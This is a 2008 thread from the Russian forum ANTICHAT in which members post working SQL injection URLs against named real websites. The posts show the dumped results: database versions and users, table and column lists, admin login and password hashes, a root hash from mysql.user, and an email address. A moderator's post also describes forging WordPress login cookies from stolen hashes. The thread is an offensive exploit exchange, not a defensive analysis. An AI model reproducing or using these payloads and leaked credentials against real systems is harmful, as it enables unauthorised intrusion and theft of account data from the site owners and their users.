ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.01.2008, 15:17
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454
Репутация:
142
|
|
4 штуки, но не пускает действительно, шяс еще порыскаю
может у них там просто траблы с самим скриптом и мы не виноваты
апд - не асили, а шоп у них всёравно на другом домене под aspx 
Последний раз редактировалось bobob; 31.01.2008 в 15:24..
|
|
|
31.01.2008, 15:31
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
что за нах там ещё xss пассив есть news_search.php
так с ней та же самая прабла орет :
You don't have permission to access /news_search.php on this server.
что за зашита такая O_o подскажите !
|
|
|
|
31.01.2008, 16:27
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040
Репутация:
177
|
|
http://www.stylepark.ru/site.php?pid=4000000+UNION+SELECT+1,concat_ws(0x3a ,login,password)+from+u58209_glg.dealers/*
dealer:051db1672e6974a5
Код:
17:cb_brends
17:--1:mid
17:--2:title
17:--3:logo
17:--4:descr
18:cb_catalog
18:--1:mid
18:--2:title
18:--3:articul
18:--4:color
18:--5:sizes
18:--6:contain
18:--7:package
18:--8:description
18:--9:foto_small
18:--10:foto_big
18:--11:brend
18:--12:newprod
19:cb_config
19:--1:email
19:--2:phone
19:--3:news_on_main
20:cb_gallery_albums
20:--1:parent
20:--2:name
20:--3:description
21:cb_gallery_images
21:--1:aid
21:--2:file
21:--3:name
21:--4:description
21:--5:alt
21:--6:sort
21:--7:cover
22:cb_menu
22:--1:pid
22:--2:title
22:--3:body
22:--4:modul
22:--5:ord
22:--6:_left
22:--7:_right
22:--8:_level
22:--9:protect
23:cb_menu_seq
24:cb_news
24:--1:mid
24:--2:title
24:--3:anons
24:--4:body
24:--5:date
25:about
25:--1:img1
25:--2:img2
25:--3:img3
25:--4:img4
25:--5:img5
25:--6:text
26:about_main
26:--1:img1
26:--2:img2
26:--3:img3
26:--4:img4
26:--5:img5
27:adv
27:--1:razdel_num
27:--2:head
27:--3:link_excel
27:--4:excel
27:--5:link_html
27:--6:html
27:--7:text
28:anons
28:--1:head
28:--2:img
28:--3:type
28:--4:text
28:--5:when
28:--6:visibility
29:asociate
29:--1:asociate_teacher
29:--2:asociate_to
29:--3:asociate_type
30:auth
30:--1:password
31:cons
31:--1:name
31:--2:email
31:--3:city
31:--4:message
31:--5:answer
31:--6:time
32:dealers
32:--1:login
32:--2:password
33:dealers_files
33:--1:name
33:--2:file
33:--3:text
34:fakultet
34:--1:fakultet_name
34:--2:fakultet_type
35:groupe
35:--1:groupe_name
35:--2:groupe_id_kaf
|
|
|
|
31.01.2008, 17:28
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
свежая уязвимость и ...
admin|91b41df29d41d9222c99702c718c27c1
admin|5cf5e1e79cc08b7b27e2dfeb6ee136a7
djsonic|85493514b935d53994045bdb044a4ab5
двойной md5 хэш пароль
wordpressuser_xxx=логин;wordpresspass_xxx=д ойной_md5_хэш_пароля
где xxx - md5 хэш урла блога без обратного слэша, например: md5("xttp//site.com/wordpress") |
|
|
|
31.01.2008, 17:30
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
например
-17'+order+by+1/* и
-17'+order+by+100000/*
никаких отличий не дали (((
как опеределили или это просто подбор унионом???
Нужно чтобы -17' - было существующий значение. 17+order+by+1/*
Подробнее https://forum.antichat.ru/showpost.php?p=373193&postcount=17
Вообщето есть специальная тема для таких вопросов - http://forum.antichat.ru/threadedpost579824.html#post579824
Последний раз редактировалось .Begemot.; 31.01.2008 в 17:37..
|
|
|
|
31.01.2008, 17:54
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
для bobob
возми для примера -
http://www.roskrup.ru/grain.html?goods=35'+order+by+1/*
http://www.roskrup.ru/grain.html?goods=35'+order+by+50/*
|
|
|
|
31.01.2008, 18:03
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454
Репутация:
142
|
|
.Begemot., 159932, терь понял, сравнивать надо было существующие, меня глючит иногда! СПАСИБО!!!
|
|
|
|
31.01.2008, 20:02
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.mediakuzbass.ru/news/index.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*
4.1.22/media/trakt@localhost
-----------------------------------------------------------------------------
http://www.mobd.ru/index.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*
4.0.25-log/wwwmobdru_mobdru_osc1/mobd@tux.hc.ru
-----------------------------------------------------------------------------
fisinter.ru
http://fisinter.ru/nametip20060207/nametip.htm?lang=de&name=335&tip=-1)+union+select+1,concat_ws(0x2F,version(),databas e(),user()),3/*
5.0.15-standard-log/KmUtfDe/db@localhost
http://fisinter.ru/nametip20060207/nametip.htm?lang=de&name=335&tip=-1)+union+select+1,concat_ws(0x2F,user,Password),3+ from+mysql.user/*
юзер/хеш
root/39d3d1360b2b23b0
--------------------------------------------------------------------------
novoport.ru
http://www.novoport.ru/news.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*
4.0.24_Debian-10sarge2/nvp/root@localhost
http://www.novoport.ru/news.php?id=-1+union+select+1,2,concat_ws(0x2F,username,user_pa ssword,user_email),4,5,6+from+phpbb_users/*
логин/хеш/мейл
Admin/d4825e84f0ce065b97c2c0772f769f1a/admin2@novoport.ru
|
|
|
|
31.01.2008, 20:09
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
rentacarmm.com
Код HTML:
http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,concat(user(),0x3a,version(),0x3a,database()),2/*&id=65
USER:car@localhost
VERSION:5.0.45-Debian_1-log
DATABASE:car
Код HTML:
http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,table_name,2+from+information_schema.tables/*&id=65
Код HTML:
http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,column_name,2+from+information_schema.columns/*&id=65
-----------------------------------------------
tercersector.net
Код HTML:
http://www.tercersector.net/php/general.php?seccio=sc_pubs&tipus=1+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*&idioma=Cs
USER:delsur@pau.pangea.org
VERSION:4.0.24_Debian-10sarge3-log
DATABASE:otsweb
-----------------------------------------------
tecnocasa.hu
Код HTML:
http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*&PHPSESSID=29b0ba2892876c303128bb0626336391
USER:rkcsaGfm7@hm0
VERSION:5.0.32-Debian_7etch4-log
DATABASE:tecnocasa_hu
Код HTML:
http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables/*&PHPSESSID=29b0ba2892876c303128bb0626336391
Код HTML:
http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns/*&PHPSESSID=29b0ba2892876c303128bb0626336391
Код HTML:
http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+where+table_name='district'+limit+1,10/*&PHPSESSID=29b0ba2892876c303128bb0626336391
- вывод всех названий колонок таблици district
|
|
|
|
31.01.2008, 21:02
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
http://tests.vratza.com/
Код HTML:
http://tests.vratza.com/material.php?id=11+UNION+SELECT+1,2,null,CONVERT(concat_ws(0x3a,version(),user(),database())+USING+LATIN1),5,6,7,8,9,10/*
5.0.18-Max:vratza@localhost:vratza_com_-_vratza
Код HTML:
http://tests.vratza.com/material.php?id=11+UNION+SELECT+1,2,null,CONVERT(table_name+USING+LATIN1),5,6,7,8,9,10+FROM+information_schema.tables/*
...
bulgariahouse_users
bulgariatour_users
dhc_users
inv_users
limestone_users
otc_users
phpads_clients
ptg_users
rcz_users
vik_users
visit_users
vratzata_users
...
Код HTML:
http://tests.vratza.com/material.php?id=11+UNION+SELECT+1,2,null,CONVERT(concat_ws(0x3a,user,pass)+USING+LATIN1),5,6,7,8,9,10+FROM+users/*
admin:1a443982b6068cd6f44624f324f4bd1e::bil274
hotfm:9bb312efb1c1d4e51e4c696b7626f00b
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
